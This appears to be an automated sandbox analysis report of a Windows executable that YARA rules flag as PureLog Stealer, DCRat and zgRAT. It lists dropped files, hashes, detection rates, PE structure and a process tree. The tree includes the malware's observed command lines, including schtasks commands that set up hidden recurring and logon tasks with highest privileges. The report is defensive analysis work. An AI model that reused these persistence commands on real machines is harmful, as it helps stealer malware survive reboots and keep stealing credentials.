                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with very long lines (330), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):330
                                                          Entropy (8bit):5.81356821267711
                                                          Encrypted:false
                                                          SSDEEP:6:hi8knEv5B7/Mz9Q+FSX9p3PpD6wTzASBc8dj/yk0aqFbSumnGS5oOM2V+JoSw49e:zx55/f+i9pxDBxcMuvPFbSumF5PM2V+k
                                                          MD5:9A8D08EA63F910635F2D4872EF2B3655
                                                          SHA1:2174E9FE90C5DFF296EC308445078F022F703424
                                                          SHA-256:56F1F1094C8C8E49184014689971F19AB879D7E45528E5FF7FDD235C97E05D8C
                                                          SHA-512:9082B4FA7726AB253E254658761012864D77B9495B848177DA93882A14410626AAF95A84DF78764694B771CA0C74AE2553462C4BD7128BA9AB0433D66AD1D7ED
                                                          Malicious:false
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with very long lines (431), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):431
                                                          Entropy (8bit):5.883473171699749
                                                          Encrypted:false
                                                          SSDEEP:12:0y4ArDq/ac/BlhQAham5ooTAIfWRyu1oReHrm:2AHqCc/jBAm5ookQWRuSm
                                                          MD5:F9C4BB457C064F908A12F50601E18D1C
                                                          SHA1:D11D3CBCFFFF7DE06FC5DF790B447E512CA7B6B6
                                                          SHA-256:DE4240BDE094A37E7A680E04D6BE7CE7D779455343F11EDC706F5AE36CED99D6
                                                          SHA-512:65C5CE25D6AD48A1C66019B6E326B19C565BD4D8091AC70229B610F5AB6815CD992D1F2FD803421E83C88A95699033592EACADE69B95CE5CFAFA650221CAD01B
                                                          Malicious:false
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\SchCache\RuntimeBroker.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\SchCache\RuntimeBroker.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1224
                                                          Entropy (8bit):4.435108676655666
                                                          Encrypted:false
                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                          Malicious:false
                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.994703751663742
                                                          Encrypted:false
                                                          SSDEEP:48:6upDPtKM7Jt8Bs3FJsdcV4MKe27hx0NPvqBHmOulajfqXSfbNtm:JPZPc+Vx9M3qvkAcjRzNt
                                                          MD5:8055E5D0094B3F48EBFB630261948B0D
                                                          SHA1:6CEE8B301B909FB12CF14FC544E08DDCB26EF983
                                                          SHA-256:8BC6B0FC155C64A919329CA9A453644C59F6D377DE99CD556C1C51208EF66543
                                                          SHA-512:2B31FD36392514E67328AAD9A2E3B8029EC2056E65F1A3ED68C9D1CB1A1B0F219C313AD9C3B16FAC2943A421842A087D168D65A202182ACEABB0D75F587CD25E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):198
                                                          Entropy (8bit):5.7053545251893185
                                                          Encrypted:false
                                                          SSDEEP:6:NUQG3EQ9VHmY1f4dd1o3O9JqhM50ndeHbiG2RBAj0Ux:FK9Vd1fAhMM2dybiG2sf
                                                          MD5:D164632CA511D0AD5EC7D57E7E0CB025
                                                          SHA1:73465130A5B106869D672CB2E385A1C97714406B
                                                          SHA-256:DE03839196DFAC63B001724481E42E944247EE525816846034C9A1C7EFD075A2
                                                          SHA-512:14A7E85412A0938A88FE9089359DF94BB008C9BDAACE8396BB4C77605A1FC1A60BC5DD521631D0AD5165ED4DABDE091B2522BE010EA27CE9566133102B45ADE0
                                                          Malicious:false
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.793964247365998
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FXXtQvj+fcRvpG6LyXKvj:Vx993DEUsC+Um8
                                                          MD5:81A882556A63121621504871B31AE370
                                                          SHA1:050E8B5FA57D2D9EB76ADB27CE96BD77F2B62725
                                                          SHA-256:43AD74B6616F6382792E6791E5F15B7B20D26A1CC9FE0DB2CA8D528B2C16B97B
                                                          SHA-512:0A19A7B6DC394B31D19D2119EF2196AF4B0DD69FA34488BB923BA0D3779A0D856590C870254D5641BFCCC026F13ACFC46D41A1DF65B24C7A3BC49444ECE709C1
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 10/01/2025 01:19:05..01:19:05, error: 0x80072746.01:19:10, error: 0x80072746.
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):1.6270888613256027
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:7aHY4r6vXR.exe
                                                          File size:14'707'581 bytes
                                                          MD5:ccd01051f9e8bf3301b3bdd406f0bc24
                                                          SHA1:4e9f71953bd348261e9342f7dd230f274d808e4a
                                                          SHA256:4fa025632546c9a5c346cde16c86c5d129d8381ace82e1a7d59ca865f948c533
                                                          SHA512:93839aad8a1c533c48c9ef9cfa87c6b5e3abefe0054be20d7a0f1bd8affa2e1787b529ed4fc0371a6874ba7670b50270b554add56436540d4b197d14337455de
                                                          SSDEEP:24576:2TbBv5rUyXVnAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/n:IBJAhMsccEmgIT1sJjdIvqr4tI5E
                                                          TLSH:58E6CF0675C68E33C2741A354667123E92A0E7253622EB0F761F2497A807BF58F762F3
                                                          Icon Hash:1515d4d4442f2d2d
                                                          Entrypoint:0x41f530
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                          Instruction
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                          .text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                          PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                                          PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                                          RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                                                          RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                                                          RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                                                          RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                                                          RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                                                          RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                                                          RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                                                          RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
                                                          RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
                                                          RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
                                                          RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
                                                          RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
                                                          RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
                                                          RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
                                                          RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
                                                          RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
                                                          RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
                                                          RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
                                                          RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
                                                          RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
                                                          RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
                                                          RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
                                                          RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
                                                          RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
                                                          RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                                                          DLL | Import
                                                          KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                          OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
                                                          gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                          Language of compilation system | Country where language is spoken
                                                          English | United States
                                                          No network behavior found

                                                          Target ID:0
                                                          Start time:23:42:06
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\Desktop\7aHY4r6vXR.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\7aHY4r6vXR.exe"
                                                          Imagebase:0xbd0000
                                                          File size:14'707'581 bytes
                                                          MD5 hash:CCD01051F9E8BF3301B3BDD406F0BC24
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1734834073.0000000006F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1735483300.00000000058B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:23:42:06
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe"
                                                          Imagebase:0x910000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:23:42:11
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" "
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:23:42:12
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:23:42:12
                                                          Start date:09/01/2025
                                                          Path:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\ChainBroker/bridgeServerFontSavesMonitor.exe"
                                                          Imagebase:0xca0000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1794524656.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 83%, ReversingLabs
                                                          • Detection: 60%, Virustotal
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:23:42:15
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:23:42:15
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:23:42:15
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:23:42:15
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline"
                                                          Imagebase:0x7ff667eb0000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:23:42:15
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES69DB.tmp" "c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP"
                                                          Imagebase:0x7ff78b860000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
